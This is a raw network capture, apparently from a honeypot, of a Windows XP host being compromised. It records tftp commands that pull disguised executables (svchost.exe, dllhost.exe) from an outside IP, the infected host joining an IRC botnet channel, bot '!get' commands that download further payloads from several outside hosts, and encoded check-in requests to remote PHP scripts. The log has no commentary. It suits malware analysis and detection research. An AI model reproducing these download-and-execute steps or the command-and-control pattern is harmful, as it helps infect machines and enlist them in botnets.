Client: dir dllcache\\\\tftpd.exe; Client: tftp -i 222.232.195.65 get svchost.exe wins\\\\SVCHOST.EXE


VICTIM:  	Microsoft Windows XP [Version 5.1.2600] 
VICTIM:  	(C) Copyright 1985-2001 Microsoft Corp.C:\\WINDOWS\\system32> 
VICTIM:  	dir wins\\dllhost.exe 
VICTIM:  	 Volume in drive C has no label. Volume Serial Number is 3CF1-1DE8 Directory of C:\\WINDOWS\\system32\\winsFile Not FoundC:\\WINDOWS\\system32> 
VICTIM:  	dir dllcache\\tftpd.exe 
VICTIM:  	 Volume in drive C has no label. Volume Serial Number is 3CF1-1DE8 Directory of C:\\WINDOWS\\system32\\dllcacheFile Not FoundC:\\WINDOWS\\system32> 
VICTIM:  	tftp -i 222.232.195.65 get svchost.exe wins\\SVCHOST.EXE 
VICTIM:  	\000\001svchost.exe\000octet\000 
VICTIM:  	\000\004\000\001 
VICTIM:  	\000\004\000\002 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000  
VICTIM:  	\000\004\000! 
VICTIM:  	\000\004\000\ 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000% 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000' 
VICTIM:  	\000\004\000( 
VICTIM:  	\000\004\000) 
VICTIM:  	\000\004\000* 
VICTIM:  	\000\004\000+ 
VICTIM:  	\000\004\000, 
VICTIM:  	\000\004\000- 
VICTIM:  	\000\004\000. 
VICTIM:  	\000\004\000/ 
VICTIM:  	\000\004\0000 
VICTIM:  	\000\004\0001 
VICTIM:  	\000\004\0002 
VICTIM:  	\000\004\0003 
VICTIM:  	\000\004\0004 
VICTIM:  	\000\004\0005 
VICTIM:  	\000\004\0006 
VICTIM:  	\000\004\0007 
VICTIM:  	\000\004\0008 
VICTIM:  	\000\004\0009 
VICTIM:  	\000\004\000: 
VICTIM:  	\000\004\000; 
VICTIM:  	\000\004\000< 
VICTIM:  	\000\004\000= 
VICTIM:  	\000\004\000> 
VICTIM:  	\000\004\000? 
VICTIM:  	\000\004\000@ 
VICTIM:  	\000\004\000A 
VICTIM:  	\000\004\000B 
VICTIM:  	\000\004\000C 
VICTIM:  	\000\004\000D 
VICTIM:  	\000\004\000E 
VICTIM:  	Transfer successful: 35088 bytes in 19 seconds, 1846 bytes/s 
VICTIM:  	C:\\WINDOWS\\system32> 
VICTIM:  	\000\001dllhost.exe\000octet\000 
VICTIM:  	\000\004\000\001 
VICTIM:  	tftp -i 222.232.195.65 get dllhost.exe wins\\DLLHOST.EXE 
VICTIM:  	\000\004\000\002 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000  
VICTIM:  	\000\004\000! 
VICTIM:  	\000\004\000\ 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000% 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000' 
VICTIM:  	\000\004\000( 
VICTIM:  	\000\004\000) 
VICTIM:  	\000\004\000* 
VICTIM:  	\000\004\000+ 
VICTIM:  	\000\004\000, 
VICTIM:  	\000\004\000- 
VICTIM:  	\000\004\000. 
VICTIM:  	\000\004\000/ 
VICTIM:  	\000\004\0000 
VICTIM:  	\000\004\0001 
VICTIM:  	\000\004\0002 
VICTIM:  	\000\004\0003 
VICTIM:  	Transfer successful: 25600 bytes in 14 seconds, 1828 bytes/s 
VICTIM:  	C:\\WINDOWS\\system32> 
VICTIM:  	wins\\DLLHOST.EXE 
VICTIM:  	NICK jcnzpokjUSER a020501 . . :_ 
VICTIM:  	JOIN &virtu 
ATTACKER:	:u. PRIVMSG jcnzpokj :!get http:/210.83.81.173:88/nmb.exe:u. PRIVMSG jcnzpokj :!get http:/serf654.com/08d.txt:u. PRIVMSG jcnzpokj :!get http:/open-consulting-company.com/fast.exe 
VICTIM:  	GET /nmb.exe HTTP/1.0User-Agent: DownloadHost: 210.83.81.173:88Pragma: no-cache 
ATTACKER:	GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B1669C2DCEECA9E5FF8F6D1DFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5C74322&v=2&t=0.693371 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: 210.83.81.173:888Connection: Keep-AlivePragma: no-cache 
VICTIM:  	HEAD /a8.txt?t=0.7987967 HTTP/1.0Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: 122.224.18.20:88Content-Length: 0Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /a8.txt?t=0.7452356 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: 122.224.18.20:88Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=948AB1552CBCF756D93597B99DDA7BC5FF61462E6C48BB2276137F3E23FAA9F2B2C9F7EE7A10AC98D1EC630D1D0C50497EB0D26AB0DF3C6915773F9A0F746415085B67C1DA0F801F81BBD8A231DFBC6349BE4B76BCC2B1B7E84A335EEF0C941C0E5F968B8C97AD3631821C9B69690B91788F654A73347750D881A0CFF345A6187C795AFE1023B2756B5393C19556CB4F&t=0.292309 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: 210.83.81.173:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=110F00E4CE5EC5642EC2BD93A0E771CF009EFD95FDD94CD5E2874100AA730F547209455CCDA7605492AFEA840A1B5F46B27C74CCED827C295230F55088F38BFAC29109AF5D881A852D17C4BE7D9302DDD522E9D4F28C3C3AA0025D305BB8F67ED485DBC6D6CDE67D1FACE87E23DADF57DA2F0A540556A2908E9A3540EC4EF60CB8A88622D2FDFB44C9F1336463A2BB3F71AF&t=5.476016E-02 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: 210.83.81.173:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /08d.txt HTTP/1.0User-Agent: DownloadHost: serf654.comPragma: no-cache 
VICTIM:  	HEAD /mstrz.jpg?t=0.6789001 HTTP/1.0Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: 58.150.174.222Content-Length: 0Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /mstrz.jpg?t=0.5026972 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: 58.150.174.222Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=130D0CE8F565F453372C5C021058C030BC754E26F6D517DDDAEACA8941EF3D6595C45543AF9506593F59871CC8F2EB073EFBBF05C1B35D0E0F3E156FA10959C78BDB90ECA2A13DA26A5099E3DA34DA0505F2B08D1A64CACC60C25E3317F4048C67366B76C7DCAD3678CB50D70E0E31AB22D5EFC09ADD93B42D7482ED0BBD01BFDADED27B586AAC696B5EA9FB6EA6D7AC&t=0.9376947 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: 210.83.81.173:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=D1CFEF0B7DED49EEF0EB8AD4FDB513E3F23BA3CB95B6E329FACA5F1C258B28708FDEB9AF0B31D6899FF977EC477D01EDC4015CE6DDAFAAF9C5F4A0DA7BD3D94760309DE15C5FEB74477DCBB16C822EF1689FEED3ADD3ABAD71D38EE3D93A43CB94C5A8B54952FE658734A33515EC9F17D02585DB7D2E7C4E3F2B6712882A8C76BCAC2683EADCC207427A5C052BEA99182CF7&t=0.6319696 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: 210.83.81.173:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /p6.asp?MAC=00-0C-29-0E-2C-21&Publicer=tr2 HTTP/1.0User-Agent: CA 0.0.0.2Host: www.zzxml.com 
VICTIM:  	HEAD /tony.exe?t=0.3428832 HTTP/1.0Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: 122.224.18.20:88Content-Length: 0Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET / HTTP/1.0Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: nevof.comConnection: Keep-Alive 
ATTACKER:	GET /tony.exe?t=0.2221186 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: 122.224.18.20:88Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /js.php?id=1123 HTTP/1.0Accept: */*Referer: http:/nevof.com/User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: nevof.comConnection: Keep-AliveCookie: Apache=192.168.1.187.1336836676832429; nevof.com[L]=1336836676; nevof.com[U]=1; nevof.com[V]=0.3; nevof.com[R]=0; nevof.com[D]=0; nevof.com[OR]=deleted 
ATTACKER:	GET /css.php?id=1123 HTTP/1.0Accept: */*Referer: http:/nevof.com/User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: nevof.comConnection: Keep-AliveCookie: Apache=192.168.1.187.1336836676832429; nevof.com[L]=1336836676; nevof.com[U]=1; nevof.com[V]=0.3; nevof.com[R]=0; nevof.com[D]=0; nevof.com[OR]=deleted 
ATTACKER:	GET /ga.js HTTP/1.0Accept: */*Referer: http:/nevof.com/User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: www.google-analytics.comConnection: Keep-Alive 
ATTACKER:	GET /relative/static/1330035304_bg-grad.gif HTTP/1.0Accept: */*Referer: http:/nevof.com/User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: images01.tzimg.comConnection: Keep-Alive 
ATTACKER:	GET /image.php?FilePath=h3w4/1181756050_tropical_beach1_ca.jpg&Width=500 HTTP/1.0Accept: */*Referer: http:/nevof.com/User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: images01.tzimg.comConnection: Keep-Alive 
ATTACKER:	GET /cache/h3w4/500_1181756050_tropical_beach1_ca.jpg HTTP/1.0Accept: */*Referer: http:/nevof.com/User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: images01.tzimg.comConnection: Keep-Alive